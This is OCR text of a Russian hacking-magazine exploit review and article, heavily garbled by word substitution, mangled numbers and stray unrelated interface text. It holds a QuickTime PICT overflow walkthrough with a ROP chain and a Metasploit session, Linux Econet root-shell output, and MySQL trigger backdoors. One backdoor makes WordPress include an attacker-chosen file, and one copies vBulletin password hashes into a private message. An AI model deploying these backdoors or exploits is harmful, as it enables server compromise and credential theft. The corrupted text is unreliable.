/1 / f

,__/

-0.40= -0.80 nn

~

n

.n.cn:"

i/

_1 14:30:40

г

0 J "'\/

0.00

/

,-J / ~

nnn

0.00 с-

/

nn

0.00

~

nn

if

0:оо г

'>nn

/

0.00 n n.

_1 14:30:50

~

gs

_1 14:31 :00

по части

(

Color

g

~

IChannel

0D escriplion

ITaq SineWave 0-10 0-6

~С2

~с3 ~С4

~ Q2

IUnils

.... Zero to Т en Counter Zero to Six Counter

---

@)

---

....

---

For Help, press F1 О д только равно з об ко дьявол интер недовольство й вместе с а ScadaPro

RewriteCond %{HTTP:Range} bytes;e-. * [NC] Rewrit eRule .? http://%{SERVER_NAМE} / [R;Зe2,L]

ценность в дальнейшем используется во качестве аргумента с целью функции, которая копирует факты изо файла во магазин . В результате прои вместе с ­

ходит захлестывание сиськи нате стеке, которое позволяет осуще­ Но вернее вс его, очевидно же, подновиться до самого версии

Apache 0.2.20.

ствить действие произвольнаго заключение на контексте тек у щего пользователя.

0

Apple QuickTime PICT PnSize Buffer Overflow

РIСТ -файл начинается заголовком на

байт, вслед которыми

012

от стамуха условная единица т изображение. В этом файле содержатся структуры данны х

CVSSV2

0.3

0111 01 011 01 011 0111

011

QuickDгaw/Color QuickDraw. QuiсkDгаw-изображение со держит заголовок фиксированной длины, вслед которыми следуют способности

переменнаго размера, описывающие изображение.

[AV:N/AC:M/AU:N/C :C/I:C/A:C] I]IШ Дата релиза:

0 августа 0011

picSize : picFrame :

годы

INTEGER; RECT;

Автор: МС, corelancOdЗr По сле сих полей располагается переменное наличность дан ­

CVE: CVE-2011-0257

ных, со д ержа щишки х оп коды. П осле дние описывают команды ри со­

QuickTime-

проприетарная методика компании

произведение н ная пока что во

0991

Apple,

раз­

го д у д ля вос п роизведения цифрового видео,

вания равно ровня метры, которые влияют получай половая принадлежность учае мое снимок . 1-м оп кодом во любом изображении принуждён выходить оп шифр версии, из-за

звука, текста, а н имации, музыки да панорамных изображений на

которым из ледует вер эта изображения . 0-й опкод представляет

различных форматах .

на вывеску 0-байтный оп шифр версии [О х 0011] . Далее следуют 0-байтная

QuickTime Player

на свою очередь- зто бес­

небесплатный мультимедийный плеер, тот или иной предприимчиво используется

издание изображения [Ox02ffi.

про просмотра множества различных типов файлов, в фолиант числе и файлы

Заголовок изображения [фиксированный размер во 00 байт]:

видео , аудио, изображений, графики равно фильмов виртуальной реаль­

ности [VR]. $ее11

lj:4Q!•]ij Описываемая небезукоризненность существ у.е. т на обработке оп заключение

$e2FF PnSize

РIСТ-файла. Обработчик преобразует 06-битное беззнаковое

$есее

04

байта

WORD WORD woRD

{опкод верси и}

{версия изображения} {зарезервированный опкод заголовка} {зарезервировано}

достоинство во 02-битное авторитет со наслышан . Это скопированное

052

ХАК Е Р

01/154/2011


ОБЗОР ЭКСПЛОИТОВ

07202С60 67202С61 67202С68

-

07202С69

07202С6С 67202С60

07202С6Е

07202С7С 67202С70 67202С7Е

07202C7F

07202С80 67202С81

07202С85 67202С8В 67202С8С 67202С92

07202С93

> 08 > 088С24

0F 0FBFC6

00000000

07202С75

0804001

0С90328С

Qu ickT_1.67202C75 n t d 01 • 0С90328С

00000000 0013B4FC

0013804С

00

00000000 00000000

ззсс ЕВ 078671FF

01С4 О0е40000

EIP

се

С е Р 0

сз

се се

R е Z е S 0

се

03

085С24 08 8883 02000000 56 8083 В20000е0 57

Т е

что касается

нu•' ~н ~ , uw•onu

0

07202С78

Qu ickT_1. 072e2C78 ES 0023 02Ьi t 0( FFFFFFFFJ CS 0018 02Ьit 0CFFFFFFFFJ SS 0023 02Ьi t 0( FFFFFFFF J OS е023 02Ьi t ее FFFFFFFFJ FS 0еЭ8 02Ьi t 0FFOOe00( FFFJ GS ее00 NULL

О 0 LastErr ERROR...SUCCESS ( 00e000e0J EFL eseee2e6 CNO,N8,NE,R,NS,PE,GE,GJ ST0 емрtу 0. 09е7058365694897е00е-311 SТ! емрtу 0. 0322735276719957000е+171 ST2 емрt у -860. 05098630785942000

PTR OS: CE8X+82J

ЗЗFF

SТЗ емрtу ST4 емрtу

0.6214153169254062000е - 015

SТ7 емрtу

0. 0519775166695107000е - 012

-1. 0946211199493547000е+173 ST5 eropty -6. 0056473384187693000е+038 ST6 емрtу 0. 05е0000000072760000

0013850С

00138510 00138514 00138518 0013851С

00138520 00138524 00138528 0013852С

00138530 00138534 00138538 0013853С

00138540 00138544 00138548 0013854С

00138550 00138554 00138558 0013855С

00138560 00138564 00138568

0013856С е0138570

00138574 00138578 0013857С

00138580

06С78001 67Е88573

07208003 00000001

о. об о 6783ЕЕ02 еюГ9 о~- о 67Е21084 Д~т9 00000040 что касается

00001000

RETURN to Qu ickT_8 . 0783EE02

froм

Qu ickT_8. 07842R80

Qu ickT_O . 07Е21084

0762R008 Dabg Qu ickT_J. 0762R008 66R78005 ~R зf Qu ickT_1. 06R78005 685R9802 eWZh Qu ickT_4.685R9802 90909090 рррр ~~§~~~~~ ~-~~ Qu ickT_9.682F0001 FFF8E805 ~ w• 4949FFFF 11 49494949 0111 49494949 0111 565R5149 IQZU 30335854 т хз0 41345856 VX4R 33413050 P0R3 41304848 HH0R 42413030 00RB 54424141 RR8T 32514141 RRQ2 42324241 RB28 42423042 0088 41385058 XPSR 494R4R43 CJJI

Передача управления держи RОР-цепочку во обработчике исключения

Данные определяющие снимок lп еременного размера]:

ства короче п ерезаписана нашим значением Ox13BDF8, в таком случае пишущий сии строки попадем прямиком возьми таковой адрес. Именно не без; него равным образом начнет свое проведение

RОР-цепочка, отвечающая вслед осмотр DEP да передачу управления возьми

{команда рисова н ия}

opcode data . opcode data •

WORD WORD

{командg_ рисования}

$00FF

WORD

{о п шифр ко н ца изображе н ия}

полезную нагрузку.

Трасса исполнения RОР-цепочки:

Выдержка изо таблицы опкодов:

$0006

SpExtra

space extra (fixed poiпt)

$00Ю

PпSize

реп size (poiпt)

0 4

$0008

РпМоdе

реп mode (word)

0

07202(75

ADD ESP, 0D0

07202С7В

RETN

07Е21084

РОР

07Е21085

RETN

ЕСХ

08994002 68994004

MOV EAX,DWORD PTR DS:[ECX] RETN

0696СА36

0696СА37

XCHG EAX,ESI RETN

06(78001 66(78002

RETN

07208003 67208004

RETN

------

Среди перечисленных во данн ой таблиц е оп кодов содержится и опкод PпSize, во обработке которого кроется ошибка, приводящая к уязвимос ти.

Код,

родящий писание получи и распишись

0691CCD8 6691CCDA

хлыст

JB SHORT QuickT_1.6691CD04 REP MOVS DWORD PTR ES: [EDI], DWORD PTR DS > JMP DWORD PTR DS:[EDX* 0+6691CDF4]

РОР

РОР

0783ЕЕ02

РОР

078ЗЕЕ0З

RETN

По сле п ступень ов выполнения стих во edi окажется значение, приво­

07Е21084

РОР

дящее ко access violat ioп. Но приблизительно вроде SЕН-цепочка на хо дескать э того безум-

07Е21085

RETN

0691CCDC

ХАКЕР

01/154/2011

ЕВР

ЕВХ

EDX

ЕСХ

053


ВЗЛОМ/ОБЗОРЭКСПЛОИТОВ

РОР

б762дее9

RETN

085А9882

РОР

085А9883

RETN PUSHAD RETN RETN

б82Feeel бВ2Fееы ббд7вее5

msf exploit(apple_quicktime_pnsize) > set CMD calc.exe CMD=> calc.exe msf exploit(apple_quicktime_pnsize) > show options Module options (e xploit / windows / fileform at / apple_quick time_pnsize): Name Current Setting Required Description

EDI

ыыдеев

ЕАХ

FILENAME

Д альше n ры г аем н а н ачал по части n касательно л езной н а г рузки, р аспол агаю щ ейс ваш покорный слуга

msf . mov

The

по части

Payload options (windows / exec): Name Current Setting Required

Ые

name .

Description

н а вместе с т еке !уже имею щ ем ф л а г ис п по отношению л нен равным образом я):

0813853( 88138548 88138544 88138548

CMD • calc.exe • yes • The command string to execute EXITFUNC • process• yes• Exit technique: seh, thread, process, nопе

CALL ESP

07Е88573

08989898

~~~~

Е8598ЗЕ8

л Ул

FFFBE885 4949FFFF

ишя

Exploit target: Id Name

яяП

е

И н а п ос л е д ок соз дадим во а р иа ц ию по отношению nи вместе с ыв ае м насчёт г что касается зкс nл ои т а с к л асси ч еской п олезной получи и распишись г р узкой на на да д е из-за п ускающе г ос автор этих строк для аль куля­ т ора во

metasploit:

03Е2 03 83F9 08 72 0R F3:R5 FF2495 ~ 90

0691CCF0 6691CCF3 6691CCF5 6691CCFC 6691СО03 6691С004 6691С008 6691СО0С 6691СО10 6691СО14 6691СО18

0691C01R

0691СО1С 6691СО1Е 6691СО21 6691СО24 6691СО27

0691C02R 6691СО20 6691СО30 6691СО33 6691СО36 6691СО38

0691C03R 6691СО41 6691СО44 6691СО46 6691СО48

0691C04R 6691С040

> 0 ВС7

BR 03000000 83Е9 04 72 0С 83Е0 03 03С8

> > .

FF2485 FF2480 90 FF2480 90

~ ~ ~

08СО9166 44СО9166 68СО91бб

> 0301

0R06 8807 8R46 01 8847 01 8R46 02 С1Е9 02 8847 02 83С6 03 83С7 03 • 03F9 08 ,л72 СС

ХР SРЗ

with DEP bypass

exploit(apple_quicktime_pnsize) > exploit

[ * ] Generated output file / home / lalala / .msf4/ data / ex-

ploits / msf.mov

msf > use exploit/ windows / fileformat / apple_quicktime_pns ize msf exploit(apple_quicktime_pnsize) > set payload windows /exec payload=> windows / exec

0691ССЕ6 6691ССЕВ 6691ССЕЕ

msf

Windows

F3:R5 FF2495 ~ 8049 00 > 0301 8R06 8807 8R46 01 С1Е9 02 7 01

if.);Jdjfi Ap ple Qui ckTime

Р lауег

0.60.92. 0

~1·1!1iji•BI Су щ ест на ую т обновл е ния , усишко тр а няющи е д а нн у ю у моя персона з вимость

RNO

ЕОХ, 0 СМР ЕСХ, 0

SHORT QuickT_1.6691C004 REP MOVS OWORO PTR ES:CEOIJ , OWORO PTR OS:CESIJ OWORO PTR OS:CEOX•4+6691COF4J NOP MOV ERX,EOI MOV ЕОХ, 0 SUB ЕСХ, 0 SHORT Qu ickT_1. 0691CCFC RNO ERX, 0 ROO ECX,ERX OWORO PTR OS:CERX•4+6691C008J Jr OWORO PTR OS:CECX•4+6691CE04J NOP 1 OWORO PTR OS:CECX•4+6691C088J 08 00 00 QuickT_1.6691C018 00 QuickT_1.6691C044 00 QuickT_1.6691C068 RNO ЕОХ,ЕСХ MOV RL, BYTE PTR OS:CESIJ MOV ВУТЕ PTR OS:CEOIJ ,RL MOV RL, BYTE PTR OS:[ESI+1J MOV ВУТЕ PTR OS:CEOI+1J ,RL MOV RL, BYTE PTR OS:CESI+2] SHR ЕСХ, 0 MOV ВУТЕ PTR OS:CEOI+2J ,RL ROO ESI, 0 ROO EOI, 0 J

Switch

t аЫе

(1-based) used a t

SEH chain of main tbread SE hand Ler QuickT_1.67202C75 4R434C46 *** CORRUPT ENTRY 001ЗВОF8

***

СМР ЕСХ, 0

SHORT QuickT_1.6691C004 REP MOVS OWORO PTR ES:[EOIJ , OWORO PTR OS:CESIJ Jt OWORO PTR OS:CEOX•4+6691COF4J LER ECX,OWORO PTR OS:CECXJ RNO ЕОХ,ЕСХ MOV RL, BYTE PTR OS:CESIJ MOV ВУТЕ PTR OS:CEOIJ ,RL MOV RL, BYTE PTR OS:CESI+1] SHR ЕСХ, 0 ВУТЕ PTR OS:[EOI+1J ,RL J

SЕН-цепочка перезаписана нашим обработчиком

051,

ХАКЕР

01/154/2011


ОБЗОР ЭКСПЛОИТОВ

Linux Kernel < 0.6.36.2 Econet Privilege Escalation Exploit

'

лучать nотенциально важную информацию с стекавой nамяти ядра.

CVSSV2 1111 01111 011 01 01111

0.2 111 0 [AV: L/АС: Н / AU : N/C : С/1 :С/А : С)

r!ШШ

Дата релиза: Автор:

Jon

0 сентября 0011 CVE: CVE-2010-4073

Obeгheide,

lj:JQ!•Jii Экnлоит интересен тем, в чем дело? на своей реализации исnользует махом три

уязвимости из конечной целью nоднятия nривилегий сверху локальной машине. Гл авной уязвимостью является захлестывание стека ядра, а не nереnолнение грудь для со теке , в чем дело? оnисывается на соответств ую ­ щем

CVE.

Приведем оnисания уnомянутых исnользуемых СVЕ-шек:

[ii:OЧ•"•fl:й:l Переnолн ение грудь получи и распишись стеке во функции

гающейся во

net/econet/af_econet.c

econet скофигурирован,

на ядрах

econet_sendmsg, расnола­ Linu x < 0.6.36.2. Когда надсыл

локальные nоль зовате ли имеют вероятность

nовысить nривилегии, nредоставляя большое количество iоvес-структур.

lj9Jфil•fl:fial Функция

ec_dev_ioctl

во

net/econet/af_econet.c

на ядрах

Linux

<

0.6.36.2

безграмотный требует наличия САР_N ET_ADMIN, сколько дает выполнимость локаль­

Пример исnользования эксnлоита:

$ gcc 07787.с -о expl -lrt $ ./expl [+] looking for symbols ... [+] resolved symbol commit_creds to exffffffff81088ade [+] resolved symbol prepare_kernel_cred to exffffffff81088ebe [+] resolved symbol ia32_sysret to exffffffff81046692 [+] spawning children to achieve adjacent kstacks .. . [+] found parent kstack at exffffвseelcбcaeee [+] found adjacent children kstacks at exffff88eeedleaeee and exffffвseeedleceee [+] lower child spawning а helper ... [+] lower child calling compat_sys_wait4 оп helper ... [+] helper going to sleep ... [+] upper child trtggering stack overfiow ... [+] helper woke up [+] lower child returned from compat_sys_wait4 [+] parent's restart_Ыock has been clobbered [+] escalating privileges ... [+] launching root shell! # id uid;e(root) gid;e(root)

ным nользователям обижать встроенные ограниче ния достуnа и конфигурировать адреса

econet

посредством iосtl-вызов

SIOCSIFADDR.

it.);ldjfi Linux Kernel

lii:OФII•IФWCI Подсистема

ipc

на ядрах

Li nux <

0.6.37-гс1 неграмотный инициализирует некото­

рые структуры, почто дает вероятность локальным nользователям весь

(game}land

<

0.6.36.2

,_i,J!Iiii•J:I Существуют обновления, устра няющи е данную уязвимос ть. :Х:


РгОхог

[php.m4sq10gmail .co m, rdot.org/ forum )

Бэкдор ~ПРОТРОЯНИВАНИЕ MYSQL С ПОМОЩЬЮ ХРАНИМЫХ ФУНКЦИИ,ПРОЦЕДУР И ТРИГГЕРОВ ХРАНИМЫЕ ПРОЦЕДУРЫ И ТРИГГЕРЫ • ЫЦу/рuд2КI ­ исходники ядовитой UDF-функции интересах

MySQL4. • ЫЦу/гh[SуМ ­

MySQL 0 появилось

изрядно

существенных нововведений:

функций да триггеров. Они успешно позволяют почувствовать на своей шкуре

сверху сторону БД некоторую деление

разных языках программирования . Хранимые процедуры кардинально

исходников.

помогают вздуть цену коэффициент полезного действия работы приложения. Они компилиру­

разъединение файрвала Аррдгmог.

важный список ограничений в целях

• blt.ly/4cvanW -

nроцедур.

• bjt.Jy/cT657 -

да во больше интересных целях­ протроянивании базы данных.

056

ются- равным образом позтому исполняется быстрее интерпретируемого SQL-зaпpoca. При их использовании имеет важное значение снижается габариты пересылаемой

в кругу сервером равно клиентом информации. Правда, нужно учитывать, что нагрузка держи СУБД рядом зто м будет увеличивается . Оно равным образом понятно: бери

стороне клиента lприложения) выполняется меньшая порцион работы, а нате

монтаж да возникновение

стороне сервера- большая. Помимо раскованно самих хранимых

.работы вместе с

процедур подавляющая СУБД поддерживают их разновидность- триг­

nосвященная триггерам.

определенных событий, например, близ выполнении операций

MySQL Ргоху • bjt.ly/o2PfjD -тема на форуме RDot,

геры . Они механически выполняются присутствие наступлении во базе данных

INSERT, UPDATE равным образом DELETE. Сегодня я посмотрим, сколько эксплуатировать их не грех невыгодный

всего чтобы самотеком реализации функцианала приложения , хотя

самым как собака упрощая бизнес­

внутренние резервы дозволительно пустить в ход

крат одни равно те но поведение от БД, а без затей поднимать соответствующую

UDF-функции с

выполняемых действий, тем

логику приложения. Но сии а

Таким образом, клиентские приложения могут далеко не претворять в действительность некоторый

хранимую процедуру. Причем приложения могут оказываться написаны аж держи

триггеров равно хранимых

поддержкахранимыхпроцеду~

SQL-

инструкций, какой компилируется нераздельно единожды равно хранится получи серве р е.

справочник компиляции

• bjt.ly/гn025q ­

В

Что представляют на лицо хранимые процедуры? Это настройка

равно для того того, дабы изучать проникновения на СУБД да задом наперед неза­ На нашем диске

тьr сможешь найти nодробное обучающее видео ко во всем описанным

на статье примерам использования триггеров.

метно замонтировать на базу данных бэкдор.

НЕОБХОДИМОСТЬЛОГИРОВАНИЯ Во пора проведения аудита скриптов И Б-специалисты во основном

обращают подчеркнуть что возьми так , по образу славно фильтруется пользовательский ввод, а данным с БД они как всегда доверяют.

ХАКЕР

01 / 054/ 0011


Бэкдор на БД

Trigger - [mytпgger on

taьte1]-

[test on MERLIN:5149] DD.Ь. 0

Dependenges

Object

c__j~§t:Q~::м:~~8.~:iN::~R mytrigger on tаЫеМ

rаые

~ame

mytrigger

Definer

tester@%

Туре

General

t;}

On event Q мer

@ Before

~ Refresh

@ lnsert

Q Update

Q Delete

Q.efinition

Compile

BEGIП

0

'~• Debug Trigger ...

EXISTS ( SELECT * FROМ ' taЬlel ' SET NEW . f2=1 ; ELSE SET NEW . f2 ( SELECT lo!AX ( f2 ) FROМ ЕПD IF ; IF

0 3

Print

0

~ Show SQL help

0

~ Restore default size

0

<l

пена

)

ТНЕП

' taЬlel ' )

+ 0;

ЕПD

0

~

)

0:

Создание нового триггера во

tаЫе1

ll 0nsert

01

01 Highlighting

01 Unicode (L

EMS SOL Manageг

Учитывая сие факт , нужно либо самому тщательно либо организовать невидимый прибор легирования, некоторый запишет

'user_pass' VARCHAR( 04 ) NOT NULL , 'timestamp' TIMESTAMP NOT NULL , PRIMARY КЕУ ( 'id' )

по сию пору поведение злоумышленника на случае несанкционированного

);

подрабатывать используемый софт нате тема различного рода атак,

доступа на базу данных равным образом тем самым даст случай оператив-

только равным образом отчетливо пофиксить обнаруженную дырку. Легирование играет огромное роль во вкусе бери этапе разработки приложения, этак и на этапе его поддержки. При этом самоуправно сервер

MySQL

далеко не дает воз­

Таблица wplog хорэ обретаться во базе test, а хранилище блага во нашем случае обозначена наравне woгdpгess. Сам триггер короче кто наделен подобный вид:

можности гибкой настройки легирования запросов для БД . Выход привести в исполнение его самому, быть помощи триггеров.

Предположим, ась? взломщик получил открытый путь во базу попу­ лярного благоеого блик WoгdPгess. Первое, что-то захочет сделать злоумышленник,- сие почти что во что-нибудь бы ведь ни стало каскад хэш а админского пассворда.

Данное мероприятие позволит со спокойной совестью отшагать во админку и, при удачном стечении обстоятельств, насадить собственный шифр во плагины, если они, конечно, доступны для того редактирования. Ведь расшифровка хэш а админа- специальность малоприятное, приблизительно равно как

WP использует до­

CREATE TRIGGER 'wp_log' BEFORE UPDATE ON 'wordpress' . 'wp_users' FOR ЕАСН ROW BEGIN IF NEW.user_pass!='$P$B9v9rCvKUXneМDBnlvCa074EtBG77hM' THEN SET INSERT INTO 'test' . 'wplog' SET 'user'=USER(), 'user_pass'=@pass; END IF; END;

статочно криптастойкий алгорифм для того хэширования, таким образом,

звук бросьте исходить шибко медленно. Предлагаю настукать триггер, кто довольно приглядывать вслед за состояни­

Из стих триггера видно, что-нибудь дьявол следит вслед таблицей wp _ useгs и, разве неизвестно кто редактирует эту таблицу, меняя общепринятый

ем хэша и, на случае его изменения, внесет на дополнительную таблицу

х эш админа, во таблицу wplog будут занесены причина об этом

сезон изменения, наименование пользователя, тот или другой менял хэш, равным образом так значе ­

изменении. Преимущества такого легирования понятны. Мы

ние, получай которое хэш меняли.

следим всего лишь после такими там и сям на базе, которые представля-

Сначала создадим таблицу, на которую будем выводить лог. Здесь

надстройка про нас любопытство , равным образом быть этом ловим неграмотный до этого времени запросы, а всего-навсего

очевидно, аюшки? отечественный триггер хорош владеть проход во эту таблицу, а поль­

потенциально опасные, как бы бы сии требования ни были сделаны ,

зователь, тот или другой прописан во конфиге вордпресса, доступа для данной

напрямую изо базы не так — не то чрез какие-либо рhр-скрипты . Также , даже если

таблице держать далеко не довольно равно инда отнюдь не полноте домышлять касательно самом ее

автор сих строк по совести распределили компетенция ради пользователей сервер а

существовании:

MySQL, ведь

злоумышленник, прочитавший конфиг вордпресса равным образом

таким образом попавший во базу, не делать что-л. безграмотный сможет определить, в чем дело?

CREATE TABLE 'wplog' 'id' INT NOT NULL AUTO_INCREMENT , 'user' VARCHAR( 08 ) NOT NULL ,

ХАКЕР

01 /154/2 01 0

ради его действиями тщательно следят. Наличие данного триггера не учитывает оный вариант, в некоторых случаях кракер добавляет нового админа в благ. Правда , добавка админа во вордпрессе- сие с огромной форой

057


хакинг

ТРОЯНИМ

БЕЗОПАСНОСТЬ

WORDPRESS

Теперь рассмотрим кое-какие способы хакерекого применения

VBULLETIN 0

триггеров быть установке различных бэкдоров . Для простоты по­ нимания во наших исследованиях наш брат будем проэксплуатировать изрядно

бэу WoгdPгess версии За годы своего существования

vBulletin 0 заслужил реnутацию

но наткнемся на таблице

беда как следует написанного форумного движка. Несмотря в в таком случае

0.5.1. Заглянув во его базу, да мы из тобой сразу wp _options держи некие пути ко локальным

файлам:

в чем дело? возлюбленный является nлатным продуктом, разведочный интерпелляция «Poweгed

Ьу

vBulletin >> на Google выдает больше 0 миллиардов совпадений, а

act i ve_p l ugi ns

a: l :{i: e ;s: 09 : "akismet/akismet . php" ;}

оглавление выявленных ба го во I Ьit.ly/ovMKX1 )- итого пару десятков на версию. Тем неграмотный менее, да у сего блик вкушать близкие интересные ба г да , для

Как сейчас отмечалось сверх , бери такие места нужно сосредоточивать

одному с которых дозволяется отнести разоблачение данных изо конфига быть

не заговаривать зубы на первую очередь, а во данном случае -тем более, что-то около что

отправке спецом сформированного поискового запроса. Более

на этом месте указаны пути ко плагинам. Ясно, что-то при помощи аддонов про­

по нитке об этомбагеты сможешь подчитать в соответствии с ссылке Ьit.ly/dBгtaA .

исходит растягивание функцианала блога, в таком случае принимать файлы плагинов ин­

Также советую тебе изменить уважение получи последние SОL-инъекции

клудятся во ядро опора движка. Несложно понять, ась? происходит

движка, их отображение позволяется сыскать получи и распишись известном сайте

сие во сценарии ./wp-settings.php. В WP версии 0.5.1 инклуд плагинов

exploit-db.com .

происходит следующим образом :

i f ( get_option( 'active_plugins' ) { $curreпt_p l ugins=get_option( 'active_plugins' ); i f ( is_array($current_plugins) ) { foreach ($current_plugins as $plugin)

сильнее сложная операция, нежели каскад пароля у существующего, так вроде необ х одимо вписать соответствующие изменения вновь равным образом во

таблицу wp _ useгmeta. Конечно, рядом серьезном подходе для вопросу логирования нежелательных запросов на базе данных следует грамотно ее рассчитать да изъявить те ячейки, редакти­ рование которых может повергнуть ко серьезным последствиям, а

{

поэтому рисковать либо наладить это, либо назначить ради такими

i f ( '' !=$plugin && file_exists( ABSPATH.PLUGINDIR . '}' .$plugin)) include_once (ABSPATH.PLUGINDIR. '/' .$pl ugin);

ячейками наблюдение. Также хочу наградить совет, с тем близ анализе базы данных твоя милость во первую ряд обращал интерес бери те ячейки, в которых присутствую т пути для файлам другими словами обрывки РНР-кода.

Размышляя в рассуждении логировании запросов, невыгодный могу малограмотный восстановить в памяти и о этакий замечательной разработке, в духе

}

MySQL Ргоху. Обычно эту

программу применяют около masteг-slave репликации, почто дает воз­ Исходя изо поверхностного анализа сего кода, становит-

можность открытым текстом в целях клиента проксировать требования нескольких

slave & master серверов. MySQL Ргоху тоже может логировать самочки

ся ясно, в чем дело? никакого особого контроля около инклуде плагинов

запросы, а спустя время выделывать их. Возмож н ости сего прокси не запрещается

разработчики безграмотный предусмотрели. Тем самым в этом месте я можем со

достаточно здорово прибавить вместе с через сценариев получи языке

легкостью вмазать дорога для любому стороннему файлу. В nосле­

lua, что такое?

предоставит способ выполнения команд операционной систе­

дующих версиях вордпресса 02.8 равным образом выше) сие ранее было исправлено

я вместе с через отсылки прокси-запросов вместе с

порядком добавления различных проверок, безвыгодный дающих скоротать

MySQL

клиента. Подроб­

нее об этом допускается процитировать здесь: Ьit.ly/rcxQxl .

? Show : Sor1

Page number: В

~

nодключение посторонних файлов. Однако автор рассматриваем

>

>>

row(s) stat1ing from row #

Ьу key: 0 None

!so

0 in 0 horizontal

v

0mode

and repeat headers after

Ю cells

v

+ Options +-Т-+

opti011_id

Ыog_id

optio11_11aщe

optio11_val11e

a11toload

насчёт

Edit

lnline Edit ~с Сору О Oelete

01

об

permalink_stru cture

что до

Edit

lnline Edit ~с Сору О Oelete

02

по отношению

gzipcompression

в рассуждении

yes

D

Edit

lnline Edit ~с Сору О Oelete

03

по отношению

hack_file

насчёт

yes

что касается

Edit

lnline Edit ~с Сору О Oelete

04

по отношению Ыog_charset

UTF-8

yes

насчёт

Edit

lnline Edit ~с Сору О Delete

05

касательно

moderation_ke ys

что касается

lnline Edit ~с Сору

Delete

06

касательно

active_plugins

а : 0:{i:O; s: 09: "akismet/akismet.php";}

yes

по отношению

lnline Edit ~с Сору О Delete

07

относительно

home

http://localhost/wp32

yes

Мес в таком случае инк луда п лагинов во базе бла г а возьми

058

yes

no

WordPress

ХАКЕР

01/154/20 01


Бэкдор на БД

TRIGGER_NAME EVENT_MANIPULATION

EVENT_OBJECТ_CATALOG

EVENT_OBJECТ_SCHEMA EVENT_OBJECТ_TABLE ACТION_STATEMENT

vb_pluggin

INSERT

def

wp271

post

BEGIN IF NEW.pagetext ='mynewtestdata' Т Н ...

vb_users

UPDATE

def

wp271

post

BEGIN IF NEW.pagetext ='getadminsdata' ТН ...

up_pluggin

INSERT

def

wp32

wp_comments

BEGIN IF NEW.comment_content =wpadminadd ...

wp_log

UPDATE

def

wp32

wp_users

BEGIN IF NEW.user_pass 1='$P$89119rCvKUXn...

Так позволительно читать созданные триггеры

версию

0.5.1

равным образом радикально можем употребить таким << умелым >> ко­

дом, написав специально предназначенный триггер, инклудящий начертанный нами

~ -.I!Ш./Ф@jф• i:iт

обложка около добавлении комментария получи и распишись благ из секретным одним словом

<<w paddplugin >>:

MySQL

Prox~ .· .· ..···· .. .. .... .. ....... .... .· J·· . ·. . ·.

CREATE TRIGGER 'up_pluggin' BEFORE INSERT ON 'wordpress' . 'wp_comments' FOR ЕАСН ROW BEGIN IF NEW.comment_content='wpaddplugin' THEN UPDATE 'wordpress' . 'wp_options' SET 'option_value'='a:l:{i:e;s:17: " .. / .. / .. /e/hi.php";}' WHERE 'wp_options' . 'option_id'=36 ; END IF; END; Вместо пути << ..1. ./. ./e/ hi.php >> тоже не грех означить линия ко лагам веб-сервера, неравно они доступны в целях чтения средствами

php, тож

п у ть вплоть до картинки, во ЕХIF-поле которой внедрен рhр-код. Вариантов может составлять масса. Другие упражнения триггеров для того вордпресса ты с можешь напасть в форуме гdot.oгg .

ТРИГГЕР ДЛЯ VBULLEТIN

..-•--D

Результатом всевозможных манипуляций от базой данных может быть не всего только совершение произвольнога заключение возьми сервере, однако вот и все равным образом

ассортимент

Client

результатов

MySQL Server (не используется)

вскрытие конфиденциальной информации юзеров, что-нибудь является сильной угрозой ради безопа не без; ности приложения. Для примера давай рассмотрим одинокий изо вариантов скрытого получения данных пользо­

Картинка, поясняющая проведение в жизнь системных команд со через

MySQL Proxy

вателей форума

vBulletin 0.

Предположим, почто у нас убирать аккаунт в форуме равно автор можем

отсылать/получать приватные сообщения, а в свою очередь порождать и редактировать посты. Для получения испарения логин:хэш автор напишем триггер, тот или иной во случае редактирования поста со определенным

ДОСТУП ЕСТЬ. ЧТО ДАЛЬШЕ?

содержанием склифосовский изменять быть со ланное нам личное оповещение с темой

Тут встает правильный вопрос: почто но может сделать злоумышленник по прошествии получения прямого доступа для

MySQL?

Если

у него поглощать преимущественное право

FILE, так возлюбленный тотально сможет притушить шелл 777 со через всем известной конструкции «SELECТ ... INTO OUTFILE ... » .Но привилегия FILE присутствует за тридевять земель безвыгодный всегда. Зачастую доступна лишь в доступную наружи директорию не без; карт-бланш ми

мочь редактирования ячеек определенных таблиц, которая, тем малограмотный менее, дает прекрасную мочь интересах проникновения

<< aj4x >> вставляя во него причина с таблицы useг:

CREATE TRIGGER 'vb_users' BEFORE UPDATE ON 'vb' . 'post' FOR ЕАСН ROW BEGIN IF NEW.pagetext 'getadmindata' THEN SET SET @data=(SELECT concat(username, ': ' ,password, ': ' ,salt) FROM user WHERE username=@my_user);

нате сервер от через изменения хэша пароля админа тож инклуда

злонамеренны х файлов вследствие БД !многие CMS берут пути для плагинам, темам иначе говоря языкам напрямую изо базы!.

ХАКЕР

01 / 054/2 011

UPDATE 'vb' . 'pmtext' SET 'message' WHERE 'pmtext' . 'title'='aj4x' ; END IF; END;

@data

059


хакинг

КРАТКИЙ ЛИКБЕЗ ПО ХРАНИМЫМ ПРОЦЕДУРАМ И ТРИГГЕРАМ Есть двум ситуации, когда-когда хранимые nроцедуры

следующих оnераторов: INSERT, LOAD DATA

малограмотный н во любом случае , а даже если во AFТER, так только лишь во

могут быть особенно nолезными:

другими словами REPLACE .

случае заnроса, активизирующего триггер.

0.

0.

Существует нескольких клиентских

Событие UPDATE означает, что-то во таблице

nриложений, наnисанных для различных

изменяется некоторая вместе с трока , ведь снедать

языках да обязанных выnолнять один в одного

исnользуется оnератор UPDATE.

оnерации со базами данных;

Событие

Необходимо обесnечить доnолнительную

во таблице, который может составлять реали з овано от

безоnасность nриложения [nользователи

nомощью оnераторов DELETE равным образом REPLACE.

0. tгiggeг _event- одно с следующих событий: INSERT, UPDATE, DELETE. 4. tЫ_ name- титул таблицы, для которой nрикреnлен

DELETE реализует вычеркивание строк

триггер .

0. tгiggeг _body-SQL-onepaтopы, которые будут выnолнены nри срабатывании триггера.

никак не nолучают неnосредственный достуn к таблицам базы данных да могут выnолнять

всего-навсего конкретные хранимые nроцедуры).

При работе вместе с триггерами равно хранимыми

Следует учитывать, что такое? инстру кции DROP TABLE равно TRUNCATE отно со ительно таблицы

nроцедурами да отнюдь не имеет смысл позабывать в рассуждении

безграмотный активизируют триггер , nотом у в чем дело? они невыгодный

изрядно большом сnиске ограничений [nолный

Хранимые nроцедуры nоявились во версии

исnользуют DELETE. С nомощью триггеров позволительно

сnисок таких ограничений ищи no ссылке во

MySQL 0.0.2. Помимо сего СУБД стала

